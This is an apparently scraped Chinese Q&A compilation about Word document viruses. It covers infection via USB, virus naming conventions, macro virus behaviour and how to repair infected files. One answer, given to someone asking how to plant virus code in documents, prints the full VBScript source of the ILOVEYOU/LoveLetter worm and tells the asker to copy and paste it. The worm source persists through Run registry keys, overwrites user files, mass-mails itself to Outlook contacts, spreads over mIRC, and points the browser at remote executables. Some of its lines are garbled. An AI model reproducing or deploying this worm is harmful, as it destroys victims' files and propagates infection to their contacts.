word文档植入病毒代码

1. 病毒是如何嵌入word文档的又是如何进入U盘的

1 病毒通常只会感染软盘或者U盘中的Word文档，对硬盘中的Word文档并不感染。

2 病毒会将软盘或者U盘中的Word文档删除，并生成同名的EXE文件，图标为Word文档图标，这具有很大的欺骗性，用户通常会双击该文件，导致病毒程序执行。

3 病毒会修改注册表以保证自身随系统启动，并生成病毒文件于系统文件夹（Win9x为windows\system；Win2000/xp为winnt/windows\system32），大小通常为32K，图标为Word图标。

解决办法：

1 用最新的杀毒软件查杀。

2 手动查杀。具体方法是查找上述系统文件夹中的具有Word文档图标且大小为32K的文件，删除之，如果提示无法删除，表明病毒正在运行，请按Alt+Ctrl+Del一次，这时病毒会结束自身，然后再删除。接下来启动Regedit（注册表编辑器），查找该文件，并删除查到的键值。（强烈建议先备份注册表）最后重新启动计算机。

3 除非必要，请将软盘或者U盘的写保护打开，以免病毒感染。

2. win-Trojan是个什么病毒啊

好像没有病毒的资料，不知道是不是错了，先看看病毒是怎样命名的吧！！！
————————————————————————
国际上对病毒命名的一般惯例为前缀+病毒名+后缀。前缀表示该病毒发作的操作平台或者病毒的类型，而DOS下的病毒一般是没有前缀的；病毒名为该病毒的名称及其家族；后缀一般可以不要的，只是以此区别在该病毒家族中各病毒的不同，可以为字母，或者为数字以说明此病毒的大小。

例如：WM.Cap.A，A表示在Cap病毒家族中的一个变种，WM表示该病毒是一个Word宏病毒。下面就讲解一下各种前缀的含义：

WM: Word宏病毒，可以在Word6.0和Word95(Word7.0)下传播发作，也可以在Word97(Word8.0)或以上的Word下传播发作，但该病毒不是在Word97制作完成的。

W97M: Word97宏病毒，这些是在Word97下制作完成，并只在Word97或以上版本的或以上的Word传播发作。

XM: Excel宏病毒在Excel5.0和Excel95下制作完成并传播发作，同样，此种病毒也可以在Excel97或以上版本传播发作。

X97M: 在Excel97下制作完成的Excel宏病毒，此类病毒也可以在Excel5.0和Excel97下传播发作。

XF: Excel程式（Excel Formula）病毒，此类病毒是用Excel4.0把程序片断植入新的Excel文档中的。

AM: 在Access95下制作完成并传播发作的Access的宏病毒。

A97M: 在Access97下制作完成并传播发作的Access的宏病毒。

W95: 顾名思义，这类是Windows95病毒，运行在Windows95操作系统下，当然也可以运行在Windows98下。

Win: Windows3.x病毒，感染Windows3.x操作系统的文件。

W32: 32位Windows病毒，感染所有的32位Widnows平台。

WNT: 同样是32位Windows病毒，但只感染Windows NT操作系统。

HLLC: 高级语言同伴（High Level Language Companion）病毒，他们通常是DOS病毒，通过新建一个附加的文件（同伴文件）来传播。

HLLP: 高级语言寄生（High Level Language Parasitic）病毒，这些通常也是DOS病毒，寄生在主文件中。

HLLO: 高级语言改写（High Level Language Overwriting）病毒，通常是DOS病毒，以病毒代码改写主文件。

Trojan/Troj: 这并不是病毒，只是特洛伊木马，通常装扮成有用的程序，但通常有恶意代码，特洛伊木马并不会传染。

VBS: 用Visual Basic Script程序语言编写的病毒。

AOL: 美国在线（AOL）环境下特殊的木马，其目的通常位窃取AOL的密码等信息。

PWSTEAL: 窃取密码等信息的木马。

JAVA: 用JAVA程序语言编写的病毒。

3. 我想在文档里面插病毒代码

:)
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / [email protected] / @GRAMMERSoft Group
/ Manila,Philippines
On Error Resume Next
dim
fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbs,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbs=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows
Scripting Host\\Settings\\Timeout")
if (rr>=1) then <-设置超时
wscr.RegWrite
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows
Scripting Host\\Settings\\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\\MSKernel32.vbs") <-复制文件
c.Copy(dirwin&"\\Win32DLL.vbs") <-复制文件

c.Copy(dirsystem&"\\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MSKernel32",dirsystem&"\\MSKernel32.vbs"

regcreate
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\Win32DLL",dirwin&"\\Win32DLL.vbs"

downread=""
downread=regget("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet
Explorer\\Download Directory")
if (downread="") then
downread="c:\\"
end if
if (fileexist(dirsystem&"\\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," http://www.skyinet.net/~young1s//WIN-BUGSFIX.exe "

elseif num = 2 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," http://www.skyinet.net/~angelcat//WIN-BUGSFIX.exe "

elseif num = 3 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," http://www.skyinet.net/~koichi//WIN-BUGSFIX.exe "

elseif num = 4 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," http://www.skyinet.net/~chu//WIN-BUGSFIX.exe "

end if
end if
if (fileexist(downread&"\\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WIN-BUGSFIX",downread&"\\WIN-BUGSFIX.exe"

regcreate
"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet
Explorer\\Main\\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbs
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or
(ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbs
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.(folderspec&"\\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbs
ap.close
set cop=fso.GetFile(f1.path)
cop.(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbs
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or
(s="mirc.ini") or (s="script.ini") or (s="mirc.hlp")
then
set
scriptini=fso.CreateTextFile(folderspec&"\\script.ini")

scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script...
mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect
and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine "; http://www.mirc.com "
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt
}"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim
x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"&a)

if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"&malead)

if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached
LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\\LOVE-LETTER-FOR-YOU.TXT.vbs")

male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"&malead,1,"REG_DWORD"

end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"&a,a.AddressEntries.Count

else
regedit.RegWrite
"HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"&a,a.AddressEntries.Count

end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER -
HTML<?-?TITLE><META NAME=@- @ Generator@- @
CONTENT=@- @BAROK VBS - LOVELETTER@- @>"&vbcrlf& _
"<META NAME=@- @ Author@- @ CONTENT=@- @spyder ?-?
[email protected] ?-? @GRAMMERSoft Group ?-? Manila,
Philippines ?-? March 2000@- @>"&vbcrlf& _
"<META NAME=@- @ Description@- @ CONTENT=@- @simple but i
think this is good...@- @>"&vbcrlf& _
"<?-?HEAD><BODY
onmouseOUT=@- @window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@
"&vbcrlf& _
" ONKEYDOWN=@- @window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@
BGPROPERTIES=@- @ fixed@- @
BGCOLOR=@- @ #FF9933@- @>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX
Control<?-?p><p>To Enable to read this HTML file<BR>-
Please press #-#YES#-# button to Enable
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@- @ infinite@- @
BGCOLOR=@- @ yellow@- @>----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@- @ JScript@- @>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf&
_
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@- @ VBScript@- @>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim
fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf&
_
"aw=1"&vbcrlf& _
"code="
dta2="set
fso=CreateObject(@-@ Scripting.FileSystemObject@- @)"&vbcrlf&
_
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf&
_
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf&
_
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf&
_
"set
wri=fso.CreateTextFile(dirs dirsystem&@- @ ^-^MSKernel32.vbs@- @)"&vbcrlf&
_
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if
(fso.FileExists(dirs dirsystem&@- @ ^-^MSKernel32.vbs@- @))
then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize
ActiveX@- @"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit =
CreateObject(@-@ WScript.Shell@- @)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Soft ware^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@- @,dirs dirsystem&@- @ ^-^MSKernel32.vbs@- @"&vbcrlf&
_
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"\'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"\'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"\'",chr(91)+chr(45)+chr(91))

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

lines(n)=replace(lines(n),"\\",chr(37)+chr(45)+chr(37))

if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set
b=fso.CreateTextFile(dirsystem+"\\LOVE-LETTER-FOR-YOU.HTM")

b.close
set
d=fso.OpenTextFile(dirsystem+"\\LOVE-LETTER-FOR-YOU.HTM",2)

d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

大多数VBS脚本病毒都是以爱虫病毒为模板刻画出来的。
把上面的代码复制粘贴进去就好了

4. 急求word宏病毒源代码

许多VB的程序，就可以作为Word宏运行

不过，先学会用word宏写出正确的程序再说吧！
不要老想着搞破坏。

5. word文档被病毒加入文件如何处理

那就选中它杀毒啊!!

6. 我的word文档染上病毒了,成了乱码怎样修复啊

一、“打开并修复”文件
Word
XP提供了一个恢复受损文档的新方法，操作步骤如下：
1.在“文件”菜单上，单击“打开”命令；
2.在“查找范围”列表中，单击包含要打开的文件的驱动器、文件夹或Internet位置；
3.在文件夹列表中，定位并打开包含文件的文件夹；
4.选择要恢复的文件；
5.单击“打开”按钮旁边的箭头，然后单击“打开并修复”。
二、从任意文件中恢复文本
Word提供了一个“从任意文件中恢复文本”的文件转换器，可以用来从任意文件中提取文字。要使用该文件转换器恢复损坏文件中的文本，操作步骤如下：
1.在“工具”菜单上，单击“选项”命令，再单击“常规”选项卡；
2.确认选中“打开时确认转换”复选框，单击“确定”按钮；
3.在“文件”菜单上，单击“打开”命令；
4.在“文件类型”框中，单击“从任意文件中恢复文本”。如果在“文件类型”框中没有看到“从任意文件中恢复文本”，则需要安装相应的文件转换器。安装方法不做赘述；
5.像通常一样打开文档。
此时，系统会弹出“转换文件”对话框，请选择的需要的文件格式。当然，如果要从受损Word文档中恢复文字，请选择“纯文本”，单击“确定”按扭。不过，选择了“纯文本”，方式打开文档后，仅能恢复文档中的普通文字，原文档中的图片对象将丢失，页眉页脚等非文本信息变为普通文字。

7. 怎样用WORD制作“宏病毒”

宏病毒就是也是一些vba代码，但是调用了 系统提供的api函数，所以就用权限做一些操作系统 级别的事情，可能会有破坏作用
要知道怎么做，你得先去研究好哈vba代码怎么写

8. 一个word文档里有病毒，新建一个word文档，复制粘贴其中内容，会染上病毒吗

你好，对于你的问题：
1、word文档如果被感染病毒的话，一般来说以宏病毒居多
2、简单说一下宏病毒的感染原理：用户打开被感染宏病毒的word文档，宏病毒会自动运行并驻留在word软件的Normal模板上，这样你以后只要新建或打开保存任何word文档，都会被感染宏病毒
3、所以，如果你的计算机感染了宏病毒，你对word文档执行的任何操作只要一经保存就会成为带毒文件
4、单纯的从word文档中复制文字内容到纯文本编辑器的操作不会感染病毒
5、所以，建议你立即使用杀毒软件清理当前计算机中的病毒
6、平时使用时，因为普通用户使用宏功能的机会不多，建议关闭宏功能，防止感染宏病毒

PS：如果你的word文档只是感染了一般病毒，则不会出现上述情况，但是保险起见，请立即杀毒！
有其他问题欢迎到电脑管家企业平台咨询，我们将竭诚为您服务！

9. word文件好像带病毒了，怎么办

要看是什么杀毒软件.
一般的杀毒软件把毒文件临时隔离到一个目录下,不会立刻删除.自己到杀毒软件里查找吧.